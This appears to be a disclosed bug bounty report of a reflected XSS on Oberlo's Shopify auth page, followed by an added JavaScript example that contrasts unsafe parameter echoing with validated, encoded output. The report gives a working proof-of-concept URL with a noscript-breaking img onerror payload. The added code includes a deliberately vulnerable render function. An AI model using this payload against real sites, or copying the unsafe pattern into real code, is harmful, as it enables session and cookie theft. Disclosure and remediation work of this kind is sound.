Reflected XSS

Disclosed: 2019-05-28 16:12:49 By 0xprial To shopify
Low
Vulnerability Details
Hi team, I found a reflected XSS on the https://app.oberlo.com domain.

## Reproduce:

* Visit **https://app.oberlo.com/auth?shop=%3C/noscript%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E** in the latest version of the Firefox browser.
* You will see a popup like the attached screenshot: {F485407}

**Tested in the latest version of Firefox**

## Impact

As this is **auth**, this XSS can lead to some serious issues, like stealing users' **auth** token or stealing browser data/cookies.

Best Regards,
**Prial**
Report Stats
  • Report ID: 569241
  • State: Closed
  • Substate: resolved
  • Upvotes: 47
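
The pattern behind this report, as an added example that is not Oberlo's or Shopify's code: a handler that echoes `shop` into a `<noscript>` block, next to a version that validates the value and encodes it on output. The `<noscript>` template, the `*.myshopify.com` hostname rule and all function names are assumptions made for illustration; the report does not show the real markup or the fix.

```javascript
// Request URL taken from the report above (its own proof-of-concept string).
const REPORT_URL =
  'https://app.oberlo.com/auth?shop=%3C/noscript%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E';

// BEFORE (assumed template): the decoded parameter is concatenated into HTML.
// With scripting enabled, a browser parses <noscript> content as raw text up
// to the first "</noscript>", so a value containing that closing tag ends the
// element early and everything after it is parsed as live markup.
function renderUnsafe(shop) {
  return `<noscript><a href="/auth?shop=${shop}">Continue</a></noscript>`;
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Context-appropriate encoding for HTML text and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumption: a legitimate shop value is a single hostname label under
// myshopify.com. Anything else is rejected before it reaches a template.
const SHOP_PATTERN = /^[a-z0-9][a-z0-9-]{0,62}\.myshopify\.com$/i;

function parseShop(requestUrl) {
  const shop = new URL(requestUrl).searchParams.get('shop');
  return shop !== null && SHOP_PATTERN.test(shop) ? shop.toLowerCase() : null;
}

// AFTER: allowlist validation first, then URL-encode for the query string and
// HTML-encode for the attribute, so neither layer depends on the other.
function renderSafe(requestUrl) {
  const shop = parseShop(requestUrl);
  if (shop === null) {
    return { status: 400, body: 'Invalid shop parameter' };
  }
  const href = '/auth?shop=' + encodeURIComponent(shop);
  return {
    status: 200,
    body: `<noscript><a href="${escapeHtml(href)}">Continue</a></noscript>`,
  };
}
```
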